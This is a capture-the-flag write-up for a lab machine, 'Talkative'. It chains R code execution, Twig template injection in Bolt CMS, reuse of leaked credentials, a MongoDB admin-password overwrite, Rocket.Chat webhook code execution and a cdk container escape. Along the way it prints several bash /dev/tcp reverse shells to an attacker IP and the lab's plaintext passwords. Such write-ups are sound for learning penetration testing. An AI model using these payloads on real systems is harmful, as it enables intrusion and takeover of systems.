Talkative machine is a vulnerable machine with Linux operating system among the reitred machines and we are expected to obtain user and oot flags using these vulnerabilities.
We perform a netwotk scan with nmap to recognize the target machine.
Classic Scan
Full Port Scan
As a result of the network scan, 22/tcp filtered ssh, 80/tcp Apache httpd 2.4.52, 3000/tcp ppp, 8080/tcp Tornado httpd 5.0, 8081/tcp Tornado httpd 5.0, 8082/tcp Tornado httpd 5.0 ports were open.
We understand that the ssh connection is filtered by fw, let’s enumerate these ports in order
80.port
Here we understand that it uses bolt as a CMS, we get an error when filling out the contact form that bolt is the directory.
When we go and look it redirects us to the login screen
Here we enter the default credential information, look at the source codes, note that we did not find any results and continue.
There is routing on port 3000 on the homepage
3000.port
Redirecting to Rocket.chat
Here is the account creation area, let’s create an account for ourselves and provide enumeration in it
If you get the error “The email entered is invalid/ Invalid email” when creating an account, type the email address with the domain talkative.htb here
We were able to log in after creating the user
We couldn’t find an attractive area of interest here, we only saw that there was a Saul Goodman admin, we made a note of it and moved on.
8080.port
We provide enumeration over this port
Here he directed us to the R language
We could not provide enumeration over ports 8081 and 8082, where 404 not found error was returned, a gobuster scan can be done in case there may be a possibility API, but we do not provide file directory scanning that we do not need for now.
On port 8080, we were redirected to the Jamovi spreadsheet web application, let’s continue with this.
Using the R editor, we saw that we can execute commands
Let’s google and see if we can run an os command here
Here by examining these exaples
try(system(“whoami”, intern = TRUE))
We typed the command
We ran it successfully
Let’s try to reversehell here
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/4747 0>&1’
We were able to get shell using the command
We understand that the shell screen we get is on docker
Here we provide local enumartion.
The bolt-administration.omv file under the root directory is noteworthy, it says that it is a zip file, we tried to look inside it on the target machine but we could not open it, so we transferred the file to ourselves with nc and then unzipped the file.
When we unzip the files here, we detect the crednetial information in the xdata.json file
matt@talkative.htb
janit@talkative.htb
saul@talkative.htb
jeO09ufhWD<s
bZ89h}V<S_DA
)SQWGm>9KHEA
We have noted this information
Here we tried these paros on the admin user in Bolt CMS, with a little bit of conjecture
admin: We were able to log in from jeO09ufhWD<s credential information.
Here we provide enumeration
In the file managemnt section we look at the view & edit templates section
Here we click on the bse-2021 option, we have seen that the source codes use 2021
We edit the index.twig file to see if there is a change in the web page
We broke the web page here 🙂
We understand that the code we added here works, we searched on Google to see if we can do code injection here.
Let’s run this code
We have seen that it works, so let’s create a revershell for ourselves
{{[“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.19/4700 0>&1′”]|filter(‘system’)}}
After saving, we refreshed the web page and got our shell
Here again we are facing a docker where we provide enumeration.
Here we saw that most of our vehicles were missing
We saw that ssh was filtered in the nmap scan, let’s try to see if it allows us to make an internal ssh connection
We tried with admin and user names and finally we were able to log in with user saul.
ssh saul@172.17.0.1
password jeO09ufhWD<s
This way we got our user flag
Since our authorization is limited here, we continue with local enumeraion
Here update_mongo.py caught our attention
We could not access this file, mongo db is being used inside but not on this machine, so we think that docker exists again
Mongodb’s default port is port 27017 and we realized that the requestor to this port is mongodb at 172.17.0.2
echo > /dev/tcp/172.17.0.2/27017; echo $?
To access the service here we will use the chisel tool, first we download chisel from github Then we create a web server for the other machine to download it from here
We go from the target machine and download the chisel
Now we make the target machine a client in chisell and then we make our atttacker machine a server so that the mongodb on the target machine can be accessed from our machine.
Then we established a connection with ongosh
After connecting here, we looked at the db’s through the title of how to pentest in mongodb, which was determined in hacktirck, then we looked at the collections, here we saw the users on meteor dbs
Here we saw our own user that we created
Let’s not bother with breaking the admin password, let’s change the admin password on roketcheat and access it
We investigated how to change it on Google
db.getCollection(‘users’).update({username: “admin”}, { $set: {“services” : {“password” : {“bcrypt” : “$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG” } } } })
We changed the password of the admin user to 12345 using the command
Let’s access the rocketech
We are logged in as admin
Here we provided emueration and found that the version is old
We tried to look for this exploit
Here we have executed the given commands
Verilen komutu
const require = console.log.constructor(‘return process.mainModule.require’)();
const { exec } = require(‘child_process’);
exec(‘/bin/bash -c “bash -i >& /dev/tcp/10.10.14.19/8000 0>&1′”);
olarak dğzenlyeip kaydettik
After saving as save changes
We will make a request to the url here
http://talkative.htb:3000/hooks/xjuij3wPdDjLBFzrE/vJmjSPsRfRFkYHY5uS4qPp5QHzzg4kmJHSiev2vTbbKgEJiA
We’re listening with nc before we’re found.
then we make a request with curl
As you can see we got root shell
We’re in another fucking docker machine
there was nothing interesting in this docker, so I decided to check what capabilities we have.
there is no immediate binary file but another way to view capabilities is by reading capsh from our local machine and using capsh var/proc/self/status
Copying CapBnd shows a value of 00000000a80425fd
Let’s decode it on our own machine to see the capabilities
Here we can see that we can read all files on the host machine
I searched here for exploits that I can use for this
We encountered Cdk
I downloaded theexploit found here to my machine and transferred it to the target machine, since the target machine does not have nc, curl, wbet, I transferred it with cat
After transferring the cdk to the target machine
./cdk run cap-dac-read-search /root/root.txt
We read the root flag
Here we could add sssh key without reading the root flag and get root shell
